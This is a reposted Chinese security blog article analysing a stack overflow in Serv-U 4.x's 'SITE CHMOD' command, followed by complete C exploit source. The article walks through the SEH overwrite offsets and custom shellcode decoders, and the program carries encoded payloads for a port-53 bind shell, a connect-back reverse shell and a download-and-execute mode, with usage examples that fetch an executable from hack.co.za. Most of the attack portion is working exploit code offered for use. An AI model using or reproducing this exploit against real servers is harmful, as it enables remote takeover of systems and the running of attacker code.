程序博客网 > 淘宝商城药店

【实战】Serv-U "site chmod xxx" Exploit

来源:互联网 发布:淘宝商城药店 编辑:程序博客网 时间:2024/06/10 02:40

Serv-U "site chmod xxx" Exploit


创建时间:2004-02-20
文章属性:转载
文章提交:velvet (zodiacsoft_at_hotmail.com)

论坛登陆名: SWAN
提交者邮件地址: ????
提交者QQ号码: ????
版权:文章属中华安全网http://www.safechina.net和作者共同所有,转载请注明出处!!
标题: Serv-U "site chmod xxx" Exploit
内容:
    kkqq发现Serv-U 4.x及其以下版本中,当传递给site chmod一个长文件名时,会发生栈溢出。
    我们来简单地看看分析,先用IDA看看发生问题的地方:

.text:004194EB loc_4194EB:                             ; CODE XREF: sub_419080+457j
.text:004194EB                 push    [ebp+var_8]     ;
.text:004194EE                 push    0FFFFFFFFh
.text:004194F0                 push    4B4h
.text:004194F5                 lea     eax, [esi+8488h]
.text:004194FB                 push    eax
.text:004194FC                 call    sub_414344
.text:00419501                 add     esp, 0Ch
.text:00419504                 push    eax             ; "550 %s: no such file or directory."
.text:00419505                 lea     edx, [ebp+buffer]
.text:0041950B                 push    edx
.text:0041950C                 call    _sprintf        ; <==这里
.text:00419511                 add     esp, 0Ch
.text:00419514                 lea     ecx, [ebp+buffer]
.text:0041951A                 push    ecx
.text:0041951B                 push    esi
.text:0041951C                 call    sub_433608
.text:00419521                 add     esp, 8
.text:00419524                 dec     [ebp+var_38]
.text:00419527                 dec     [ebp+var_38]
.text:0041952A                 cmp     [ebp+var_8], 0
.text:0041952E                 jz      loc_4195BD
.text:00419534                 mov     eax, [ebp+var_8]
.text:00419537                 mov     edx, [eax-0Ch]

    当提交一个不存在的文件时,Serv-u会反馈一个文件没有找到的消息。存放错误信息的buffer小于0x1EC(?),而实际可以接受的文件名字长度超过了0x500,sprintf的时候,一下子就越界了。
    还是主要针对利用吧,有兴趣慢慢分析的朋友,估计也不想看我在这里废话,从上面说到的地方往回找,自然会找到判断命令和处理的地方。
    提交超长文件名的时候,在.text:00419537 mov edx, [eax-0Ch]处一般会发生一个内存访问的异常,倒回去看,因为上面一句mov eax, [ebp+var_8],而我们覆盖了[ebp+var_8]所致。这样,覆盖SEH地址应该是很容易利用这个漏洞的,我们先用ollydbg看看发生异常时的情况。

EBP-58   > 77E3929C  USER32.77E3929C
EBP-54   > 06EB06EB  Pointer to next SEH record
EBP-50   > 77E3929C  SE handler            <=需要精心覆盖的地方;
EBP-4C   > 06EB06EB
EBP-48   > 77E3929C  USER32.77E3929C

BUFFER
EBP-1EC  > 20303535

    计算一下,因为文件名是从ftp的根目录开始算的,加上前面的"550 ",也就是说buffer一定有一个"550 /",这是5个字节,简单看来就是提交的文件名在0x1EC - 0x50 - 0x5 = 0x197 = 407字节处,就是实际覆盖SEH的地方。
    实际上我们可能对根目录没有写的权限,在CWD到一个可写目录后,返回错误信息的buffer前面就成了"550 /xxx/",在切换目录的时候,我们应该记录下目录名的长度,实际覆盖SEH的地方就成了407 - nPathLen。很自然的,403 - nPathLen的地方应该是一个nop/nop/jmp 4,而411 - nPathLen开始就可以是shellcode了。
    在出现内存访问异常之前,还有两个dec [ebp+var_38]我们要注意一下,因为这里会改变我们的shellcode,425 - nPathLen处的字符加二就可以解决了。
    由于FTP本身的协议,以及我们提交的数据要是合法的文件名等限制,在shellcode中不能出现" "、":"、"?"、"/"以及0xffffff、0x0A等等,现有的市面上的shellcode都不符合要求,稍微改写一下。

    出问题一般是因为shellcode在最前面一段解码的过程中有非法的字符,单独对这个漏洞而言很好解决,因为获得控制权的时候ebx地址是确定的(我们本来就是jmp ebx过来的),所以直接计算实际有作用的shellcode地址开始解码也可以,或者从ebx开始搜索也可以,我是采取的后面一个做法。改写后的解码部分如下,因为调试的关系,很多0x90的地方原来是0xCC,后来也没有改回来:-)

"/x90/x8B/xC3/xBB/x51/x50/x50/x50/x4B/x40/x39/x18/x75/xFB/x40/x40"
"/x40/x33/xC9/x90/x90/x66/xB9/x7D/x01/x80/x34/x08/x99/xE2/xFA/x90"
"/x50/x50/x50/x50"

90                   nop
8B C3                mov         eax,ebx
BB 51 50 50 50       mov         ebx,50505051h
4B                   dec         ebx
40                   inc         eax
39 18                cmp         dword ptr [eax],ebx
75 FB                jne         -5                 ;到inc eax
40                   inc         eax
40                   inc         eax
40                   inc         eax
33 C9                xor         ecx,ecx
90                   nop
90                   nop                            ;记得这里要+2,实际是0x92
66 B9 7D 01          mov         cx,17Dh            ;解码的长度,17d够了
80 34 08 99          xor         byte ptr [eax+ecx],99h
E2 FA                loop        -6                 ;到xor
90                   nop
50                   push        eax                ;_emit 50h
50                   push        eax
50                   push        eax
50                   push        eax

    意思就是把0x50505050作为标记(本身也是可执行的,push eax),赋给ebx 0x50505051后dec ebx(防止找错了地方),然后从eax(原来的ebx)开始找encode过的真实shellcode,最后解码。实际的由于第21个字节被dec过两次,所以要补回来。最后处理过的bind53的shellcode是类似于这样的,去掉了原来的头,换了上面说的那一个:

"/x90/x8B/xC3/xBB/x51/x50/x50/x50/x4B/x40/x39/x18/x75/xFB/x40/x40"
"/x40/x33/xC9/x90/x92" //92? Yes, 0x92! Two nops for fun
                       //.text:00419524                 dec     [ebp+var_38]
                       //.text:00419527                 dec     [ebp+var_38]
"/x66/xB9/x7D/x01"
"/x80/x34/x08/x99/xE2/xFA/x90/x50/x50/x50/x50"

//bind port 53, lion's shellcode
"/x70/x95/x98/x99/x99/xC3/xFD/x38/xA9/x99/x99/x99/x12/xD9/x95/x12"
... ...

    还可以稍微改进一下的。精简后就成了这样子:

//search from ebx and decode
"/xbe/x0c/x99/xe2/xfa/x4e/x43/x39/x33/x75/xfb/x83/xc3/x03/x33/xc9"
"/x66/xb9/x80/x01/x80/x34/x0b/x99/xe2/xfa"

    mov esi,    0xfae2990c
    dec esi
findsc_loop:
    inc    ebx
    cmp    dword ptr [ebx],esi
    jne    findsc_loop
    add    ebx,3
    xor    ecx,ecx
    mov    cx,180h
decode_loop:
    xor    byte ptr [ebx+ecx],99h
    loop    decode_loop

    当然,直接计算real shellcode的起始地址也可以,这个就相对来说不那么通用了,我们假设覆盖的时候结构是这样子的:

-----+-------------+--------------+--------+-------------------
AA...| 90 90 jmp 4 | RET(jmp ebx) | decode | encoded shellcode
-----+-------------+--------------+--------+-------------------
        ^^--EBX

    decode获得控制权的时候,ebx指向的第一个0x90,也就是说ebx + 8 + decode的长度,就是encoded shellcode的首地址,先要写一个decode的框架出来,然后ebx才能确定

    add    ebx,5                  ; <==这个值待定
    xor    ecx,ecx
    mov    cx,180h
decode_loop:
    xor    byte ptr [ebx+ecx],99h
    loop    decode_loop

    判断一下长度,是15,这样子,ebx应该加 8 + 15 = 23 = 0x17,但实际上,因为loop中ecx到0后不会跳回去执行xor,所以ebx应该加的是0x16,把0x16填回去就可以了。最后得到的是:

"/x83/xC3/x16/x33/xC9/x66/xB9/x83/x01/x80/x34/x0B/x99/xE2/xFA"

    十五个字节的decode,呵呵,最短了~
    如果是download & exec的shellcode,稍微麻烦一点,因为":"不能出现。不想打字了,直接看xploit怎样处理的吧。一点都不喜欢打字,写xploit花了2小时,打字都不止这么长时间了……
    用下面的xploit吧,设定的timeout是1秒,一般来说如果在change dir后停了一秒然后出来成功的字样就确实是成功了,如果马上出来成功字样,一定是覆盖的地址没有对,serv-u挂了。jmp ebx用的是0x7FFA4A1B,对cn/en win2k都还比较有效,自己试试看,换换也可以的。
    程序写得不好,有些判断只是想当然的而已,很有可能误报一些结果,你也可以去掉全部的if(buff[0] != '2')判断来默认每一步都是正确的,也可以把timeout设定的大一点(默认是一秒)。我在自己的机器上(win2k cn sp3/sp4, en sp4)测试Serv-U 4.1.0.3/4.1.0.2/4.0.0.x都能够很好的工作。




/*

  kkqq found that when connecting to a FTP server using Serv-U(v4.x and below),
the operation "SITE CHMOD 755 <Longfilename>" will cause stack-based overflow.
This is only exploitable when you have the writing privilege.
  Er, IDA told me that:

.text:004194EB loc_4194EB:                              ; CODE XREF: sub_419080+457.j
.text:004194EB                 push    [ebp+var_8]      ; point to filename
.text:004194EE                 push    0FFFFFFFFh
.text:004194F0                 push    4B4h
.text:004194F5                 lea     eax, [esi+8488h]
.text:004194FB                 push    eax
.text:004194FC                 call    sub_414344
.text:00419501                 add     esp, 0Ch
.text:00419504                 push    eax              ; format = "550 %s: no such file or directory."
.text:00419505                 lea     edx, [ebp+buffer]
.text:0041950B                 push    edx
.text:0041950C                 call    _sprintf         ; <============== ^_^
.text:00419511                 add     esp, 0Ch
.text:00419514                 lea     ecx, [ebp+buffer]
.text:0041951A                 push    ecx
.text:0041951B                 push    esi
.text:0041951C                 call    sub_433608
.text:00419521                 add     esp, 8
.text:00419524                 dec     [ebp+var_38]     ; this is why 0x92 appears
.text:00419527                 dec     [ebp+var_38]
.text:0041952A                 cmp     [ebp+var_8], 0
.text:0041952E                 jz      loc_4195BD
.text:00419534                 mov     eax, [ebp+var_8] ; <== attention
.text:00419537                 mov     edx, [eax-0Ch]   ; <== My ollydbg stopped here and @#$!@# then
                                                        ; shellcode ran ^_^. Choosing a value (address)
                                                        ; that could be read for eax would lead another way
*/

#include <winsock.h>
#include <windows.h>
#include <stdio.h>

#pragma comment (lib,"ws2_32")

void help(char *program)
{
    printf("=======================================================/r/n");
    printf("Serv-U /"site chmod xxx longfilename/" Xploit v0.20 alpha/r/n");
    printf("Originally discovered by kkqq@USTC --thank you~ (*^_^*)/r/n");
    printf("          For Serv-U 4.x with Win2k written by SWAN@SEU/r/n");
    printf("=======================================================/r/n/r/n");
    printf("Usage: %s <Host> <Port> <User> <Pass> <DIR>/r/n",program);
    printf("       %s <Host> <Port> <User> <Pass> <DIR> <url>/r/n",program);
    printf("       %s <Host> <Port> <User> <Pass> <DIR> <Your IP> <Your port>/r/n",program);
    printf("e.g.:/r/n");
    printf(" (1) You have write privilege at /upload//r/n");
    printf("     %s 127.0.0.1 21 test test upload http://hack.co.za/swan.exe/r/n", program);
    printf(" (2) You have write privilege at root/r/n");
    printf("     %s 127.0.0.1 21 test test / 202.119.9.42 8111/r/n", program);
    printf("/r/n   This is an OverWrite-SEH-And-Call-EBX version(jmp ebx at 0x7FFA4A1B),/r/n");
    printf("choose a mode you like to open port 53, connect back or download & exec./r/n");
    printf("For XP/2k3, you may try to exploit this in another way.../r/n");
    return;
}

unsigned char bpsc[]=
// "decoding" code should not contain /xff/xff/xff nor /x0a nor ':' ....
// so search from ebx, to find the head of the encoded shellcode
"/x90/x8B/xC3/xBB/x51/x50/x50/x50/x4B/x40/x39/x18/x75/xFB/x40/x40"
"/x40/x33/xC9/x90/x92" //92? Yes, 0x92! Two nops for fun
                       //.text:00419524                 dec     [ebp+var_38]
                       //.text:00419527                 dec     [ebp+var_38]
"/x66/xB9/x7D/x01"
"/x80/x34/x08/x99/xE2/xFA/x90/x50/x50/x50/x50"

//bind port 53
"/x70/x95/x98/x99/x99/xC3/xFD/x38/xA9/x99/x99/x99/x12/xD9/x95/x12"
"/xE9/x85/x34/x12/xD9/x91/x12/x41/x12/xEA/xA5/x12/xED/x87/xE1/x9A"
"/x6A/x12/xE7/xB9/x9A/x62/x12/xD7/x8D/xAA/x74/xCF/xCE/xC8/x12/xA6"
"/x9A/x62/x12/x6B/xF3/x97/xC0/x6A/x3F/xED/x91/xC0/xC6/x1A/x5E/x9D"
"/xDC/x7B/x70/xC0/xC6/xC7/x12/x54/x12/xDF/xBD/x9A/x5A/x48/x78/x9A"
"/x58/xAA/x50/xFF/x12/x91/x12/xDF/x85/x9A/x5A/x58/x78/x9B/x9A/x58"
"/x12/x99/x9A/x5A/x12/x63/x12/x6E/x1A/x5F/x97/x12/x49/xF3/x9A/xC0"
"/x71/x1E/x99/x99/x99/x1A/x5F/x94/xCB/xCF/x66/xCE/x65/xC3/x12/x41"
"/xF3/x9C/xC0/x71/xED/x99/x99/x99/xC9/xC9/xC9/xC9/xF3/x98/xF3/x9B"
"/x66/xCE/x75/x12/x41/x5E/x9E/x9B/x99"
"/x99/xAC"  //<== Port xor 0x9999, default is 53
"/xAA/x59/x10/xDE/x9D"
"/xF3/x89/xCE/xCA/x66/xCE/x69/xF3/x98/xCA/x66/xCE/x6D/xC9/xC9/xCA"
"/x66/xCE/x61/x12/x49/x1A/x75/xDD/x12/x6D/xAA/x59/xF3/x89/xC0/x10"
"/x9D/x17/x7B/x62/x10/xCF/xA1/x10/xCF/xA5/x10/xCF/xD9/xFF/x5E/xDF"
"/xB5/x98/x98/x14/xDE/x89/xC9/xCF/xAA/x50/xC8/xC8/xC8/xF3/x98/xC8"
"/xC8/x5E/xDE/xA5/xFA/xF4/xFD/x99/x14/xDE/xA5/xC9/xC8/x66/xCE/x79"
"/xCB/x66/xCE/x65/xCA/x66/xCE/x65/xC9/x66/xCE/x7D/xAA/x59/x35/x1C"
"/x59/xEC/x60/xC8/xCB/xCF/xCA/x66/x4B/xC3/xC0/x32/x7B/x77/xAA/x59"
"/x5A/x71/x76/x67/x66/x66/xDE/xFC/xED/xC9/xEB/xF6/xFA/xD8/xFD/xFD"
"/xEB/xFC/xEA/xEA/x99/xDA/xEB/xFC/xF8/xED/xFC/xC9/xEB/xF6/xFA/xFC"
"/xEA/xEA/xD8/x99/xDC/xE1/xF0/xED/xCD/xF1/xEB/xFC/xF8/xFD/x99/xD5"
"/xF6/xF8/xFD/xD5/xF0/xFB/xEB/xF8/xEB/xE0/xD8/x99/xEE/xEA/xAB/xC6"
"/xAA/xAB/x99/xCE/xCA/xD8/xCA/xF6/xFA/xF2/xFC/xED/xD8/x99/xFB/xF0"
"/xF7/xFD/x99/xF5/xF0/xEA/xED/xFC/xF7/x99/xF8/xFA/xFA/xFC/xE9/xED"
"/x99/xFA/xF5/xF6/xEA/xFC/xEA/xF6/xFA/xF2/xFC/xED/x99";


#define    IP_OFFSET    249
#define    PORT_OFFSET    244
unsigned char cbsc[]=
//search from ebx and decode
"/xbe/x0c/x99/xe2/xfa/x4e/x43/x39/x33/x75/xfb/x83/xc3/x03/x33/xc9"
"/x66/xb9/x80/x01/x82/x34/x0b/x99/xe2/xfa"

//connect back
//from http://www.xfocus.net/articles/200307/574.html
"/x70/x6D/x99/x99/x99/xC3/x21/x95/x69/x64/xE6/x12/x99/x12/xE9/x85"
"/x34/x12/xD9/x91/x12/x41/x12/xEA/xA5/x9A/x6A/x12/xEF/xE1/x9A/x6A"
"/x12/xE7/xB9/x9A/x62/x12/xD7/x8D/xAA/x74/xCF/xCE/xC8/x12/xA6/x9A"
"/x62/x12/x6B/xF3/x97/xC0/x6A/x3F/xED/x91/xC0/xC6/x1A/x5E/x9D/xDC"
"/x7B/x70/xC0/xC6/xC7/x12/x54/x12/xDF/xBD/x9A/x5A/x48/x78/x9A/x58"
"/xAA/x50/xFF/x12/x91/x12/xDF/x85/x9A/x5A/x58/x78/x9B/x9A/x58/x12"
"/x99/x9A/x5A/x12/x63/x12/x6E/x1A/x5F/x97/x12/x49/xF3/x9A/xC0/x71"
"/xE9/x99/x99/x99/x1A/x5F/x94/xCB/xCF/x66/xCE/x65/xC3/x12/x41/xF3"
"/x9B/xC0/x71/xC4/x99/x99/x99/x1A/x75/xDD/x12/x6D/xF3/x89/xC0/x10"
"/x9D/x17/x7B/x62/xC9/xC9/xC9/xC9/xF3/x98/xF3/x9B/x66/xCE/x61/x12"
"/x41/x10/xC7/xA1/x10/xC7/xA5/x10/xC7/xD9/xFF/x5E/xDF/xB5/x98/x98"
"/x14/xDE/x89/xC9/xCF/xAA/x59/xC9/xC9/xC9/xF3/x98/xC9/xC9/x14/xCE"
"/xA5/x5E/x9B/xFA/xF4/xFD/x99/xCB/xC9/x66/xCE/x75/x5E/x9E/x9B/x99"
"/x9E/x24/x5E/xDE/x9D/xE6/x99/x99/x98/xF3/x89/xCE/xCA/x66/xCE/x65"
"/xC9/x66/xCE/x69/xAA/x59/x35/x1C/x59/xEC/x60/xC8/xCB/xCF/xCA/x66"
"/x4B/xC3/xC0/x32/x7B/x77/xAA/x59/x5A/x71/x9E/x66/x66/x66/xDE/xFC"
"/xED/xC9/xEB/xF6/xFA/xD8/xFD/xFD/xEB/xFC/xEA/xEA/x99/xDA/xEB/xFC"
"/xF8/xED/xFC/xC9/xEB/xF6/xFA/xFC/xEA/xEA/xD8/x99/xDC/xE1/xF0/xED"
"/xC9/xEB/xF6/xFA/xFC/xEA/xEA/x99/xD5/xF6/xF8/xFD/xD5/xF0/xFB/xEB"
"/xF8/xEB/xE0/xD8/x99/xEE/xEA/xAB/xC6/xAA/xAB/x99/xCE/xCA/xD8/xCA"
"/xF6/xFA/xF2/xFC/xED/xD8/x99/xFA/xF6/xF7/xF7/xFC/xFA/xED/x99";

unsigned char dehead[]=
"/x90/x8B/xC3/xBB/x51/x50/x50/x50/x4B/x40/x39/x18/x75/xFB/x40/x40"
"/x40/x33/xC9/x90/x92/x66/xB9/xF0/x01/x80/x34/x08/x99/xE2/xFA/x90"
"/x50/x50/x50/x50"

//download & execute
//modified slightly...
"/x70/x4D/x99/x99/x99/xC3/x21/x95/x69"
"/x64/xE6/x12/x99/x12/xE9/x85/x34/x12/xD9/x91/x12/x41/x12/xEA/xA5"
"/x9A/x6A/x12/xEF/xE1/x9A/x6A/x12/xE7/xB9/x9A/x62/x12/xD7/x8D/xAA"
"/x74/xCF/xCE/xC8/x12/xA6/x9A/x62/x12/x6B/xF3/x97/xC0/x6A/x3F/xED"
"/x91/xC0/xC6/x1A/x5E/x9D/xDC/x7B/x70/xC0/xC6/xC7/x12/x54/x12/xDF"
"/xBD/x9A/x5A/x48/x78/x9A/x58/xAA/x50/xFF/x12/x91/x12/xDF/x85/x9A"
"/x5A/x58/x78/x9B/x9A/x58/x12/x99/x9A/x5A/x12/x63/x12/x6E/x1A/x5F"
"/x97/x12/x49/xF3/x9D/xC0/x71/xC9/x99/x99/x99/x1A/x5F/x94/xCB/xCF"
"/x66/xCE/x65/xC3/x12/x41/xF3/x98/xC0/x71/xA4/x99/x99/x99/x1A/x5F"
"/x8A/xCF/xDF/x19/xA7/x19/xEC/x63/x19/xAF/x19/xC7/x1A/x75/xB9/x12"
"/x45/xF3/xB9/xCA/x66/xCE/x75/x5E/x9D/x9A/xC5/xF8/xB7/xFC/x5E/xDD"
"/x9A/x9D/xE1/xFC/x99/x99/xAA/x59/xC9/xC9/xCA/xCF/xC9/x66/xCE/x65"
"/x12/x45/xC9/xCA/x66/xCE/x69/xC9/x66/xCE/x6D/xAA/x59/x35/x1C/x59"
"/xEC/x60/xC8/xCB/xCF/xCA/x66/x4B/xC3/xC0/x32/x7B/x77/xAA/x59/x5A"
"/x71/xBE/x66/x66/x66/xDE/xFC/xED/xC9/xEB/xF6/xFA/xD8/xFD/xFD/xEB"
"/xFC/xEA/xEA/x99/xDE/xFC/xED/xCA/xE0/xEA/xED/xFC/xF4/xDD/xF0/xEB"
"/xFC/xFA/xED/xF6/xEB/xE0/xD8/x99/xCE/xF0/xF7/xDC/xE1/xFC/xFA/x99"
"/xDC/xE1/xF0/xED/xC9/xEB/xF6/xFA/xFC/xEA/xEA/x99/xD5/xF6/xF8/xFD"
"/xD5/xF0/xFB/xEB/xF8/xEB/xE0/xD8/x99/xEC/xEB/xF5/xF4/xF6/xF7/x99"
"/xCC/xCB/xD5/xDD/xF6/xEE/xF7/xF5/xF6/xF8/xFD/xCD/xF6/xDF/xF0/xF5"
"/xFC/xD8/x99";
//"http://127.0.0.1/hello.exe"
//"/x80";
unsigned char desc[500]={0};

void main(int argc, char *argv[])
{
    WSADATA wsaData;
    SOCKET s;
    struct hostent *he;
    struct sockaddr_in host;
    int nTimeout = 1000;
    if(argc!=6&&argc!=7&&argc!=8)
    {
        help(argv[0]);
        return;
    }
    if(argc==7)
    {
        //initialize the download & execute shellcode
        //shellcode head + ((url + 0x80) xor 0x99 )  <==all for damned ':' and '/'
        memset(desc, 0, 500);
        memcpy(desc, dehead, sizeof(dehead));
        char url[255];
        strcpy(url, argv[6]);
        strcat((char*)url, "/x80");
        for(unsigned int j=0; j < strlen(url); j++)
            url[j] = url[j]^'/x99';
        strcat((char*)desc, url);
    }
    if(argc==8)
    {
        unsigned short port = htons(atoi(argv[7]))^(u_short)0x9999;
        unsigned long ip = inet_addr(argv[6])^0x99999999;
        memcpy(&cbsc[PORT_OFFSET], &port, 2);
        memcpy(&cbsc[IP_OFFSET], &ip, 4);
    }

    if(WSAStartup(0x0101,&wsaData)!=0)
    {
        printf("error starting winsock..");
        return;
    }
    if((he = gethostbyname(argv[1]))==0)
    {
        printf("Failed resolving '%s'",argv[1]);
        return;
    }
    host.sin_port = htons(atoi(argv[2]));
    host.sin_family = AF_INET;
    host.sin_addr = *((struct in_addr *)he->h_addr);

    if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
        printf("Failed creating socket");
        return;
    }

    if ((connect(s, (struct sockaddr *) &host, sizeof(host))) == -1)
    {
        printf("Failed connecting to host/r/n");
        return;
    }
    setsockopt(s, SOL_SOCKET, SO_RCVTIMEO, (char*)&nTimeout,sizeof(nTimeout));
    
    char buff[50000]={0};
    memset(buff, 0, sizeof(buff));

    char szUser[255] = {0};
    strcpy(szUser, "USER ");
    strcat(szUser, argv[3]);
    strcat(szUser, "/r/n");

    char szPass[255] = {0};
    strcpy(szPass, "PASS ");
    strcat(szPass, argv[4]);
    strcat(szPass, "/r/n");

    int bread = recv(s,buff,sizeof(buff),0);
    if(bread == -1)
    {
        closesocket(s);
        printf("No response... Perhaps it has been hacked!/r/n");
        return;
    }
    printf(buff);

    //send user
    send(s, szUser, strlen(szUser), 0);
    memset(buff, 0, sizeof(buff));
    recv(s, buff, sizeof(buff), 0);
    printf(buff);

    //send pass
    send(s, szPass, strlen(szPass), 0);
    memset(buff, 0, sizeof(buff));
    recv(s, buff, sizeof(buff), 0);
    printf(buff);

    if(buff[0] != '2')
    {
        closesocket(s);
        printf("Authentication failed!/r/n");
        return;
    }

    //change dir
    char szChangeDir[255]={0};
    strcpy(szChangeDir,"CWD /");
    strcat(szChangeDir,argv[5]);
    strcat(szChangeDir,"/r/n");
    send(s, szChangeDir, strlen(szChangeDir), 0);
    memset(buff, 0, sizeof(buff));
    recv(s, buff, sizeof(buff), 0);
    printf(buff);
    
    if(buff[0] != '2')
    {
        closesocket(s);
        printf("Error changing path!/r/n");
        return;
    }

    int nPathLen = strlen(argv[5])+1;
    if(argv[5][nPathLen-2] == '/')
        nPathLen--;
    if(nPathLen == 1)
        nPathLen--;

    char xploit[1500] = {0};
    char head[] = "SITE CHMOD 755 ";
    char evil[1000] = {0};
    memset(xploit, 0, sizeof(xploit));
    for(int i = 0; i < 403; i++)
        evil[i] = '/x90';

    *((int*)(evil + 403 - nPathLen)) = 0x04EB9090; //nop nop jmp 4
    *((int*)(evil + 407 - nPathLen)) = 0x7FFA4A1B; //jmp ebx

    if(argc==6)
        memcpy(evil+411 - nPathLen, bpsc, sizeof(bpsc));
    if(argc==7)
        memcpy(evil+411 - nPathLen, desc, strlen((char*)desc));
    if(argc==8)
        memcpy(evil+411 - nPathLen, cbsc, sizeof(cbsc));
    strcpy(xploit, head);
    strcat(xploit, evil);
    strcat(xploit, "/r/n");
    send(s, xploit, strlen(xploit), 0);

    memset(buff, 0, sizeof(buff));
    bread = recv(s, buff, sizeof(buff), 0);
    if(bread == -1)
    {
        closesocket(s);
        if(argc==6)
            printf("Success! Try connect port 53 to get your shell.../r/n");
        if(argc==7)
            printf("Success! Host has download and execute the program.../r/n");
        if(argc==8)
            printf("Success! See your nc.exe.../r/n");
        return;
    }
    printf("Failed... Perhaps it has been patched, or you don't have the writing privilege!/r/n");
    closesocket(s);
    return;
}
淘宝商城药店 淘宝商城药店
原创粉丝点击
热门IT博客
淘宝如何获取精品橱窗淘宝如何获取精品橱窗
数字滤波算法快速滤波数字滤波算法快速滤波
flume采集数据到kafka
hf线切割编程软件8.0
2017淘宝卖家参加双12
java.util jar包下载
网络刷手要资金吗?
飞鱼科技 知乎
上海留学生落户 知乎
js修改button的值
car软件
网络舆情工作心得体会
安卓一键刷机软件
淄博阿雷seo博客
新手音乐制作软件
淘宝全屏轮播代码生成
佳能 eos utility mac
mac安装ug
万花筒相片软件
jenkins 本机部署php
热门问题 老师的惩罚 人脸识别 我在镇武司摸鱼那些年 重生之率土为王 我在大康的咸鱼生活 盘龙之生命进化 天生仙种 凡人之先天五行 春回大明朝 姑娘不必设防,我是瞎子 克孜尔尕哈千佛洞旅游 克孜尔千佛洞旅游 克孜尔石窟 柯尔克孜族服饰 柯尔克孜 克孜勒苏 克孜加尔湖 克山县 克山 哈尔滨-克山 哈尔滨 克山 克山县属于哪个市 克山吧 克州 新疆克州 克州公共资源交易中心 克州在哪 克州公共资源交易中心网 克州职业技术学院 克州蓝天酒店 克州电大 阿图什克州宾馆 克州旅游景点 克扣 克拉拉 克拉霉素 克拉 克拉默法则 克拉霉素片 克拉女神 21克拉 查克拉 克拉拉结婚 塔克拉玛干 希波克拉底 克拉运河 克拉维酸钾 一克拉等于 克拉肯 克拉苏 金克拉

程序博客网,程序员的互联网技术博客家园。csdn论坛精品 msdn技术资料都在这里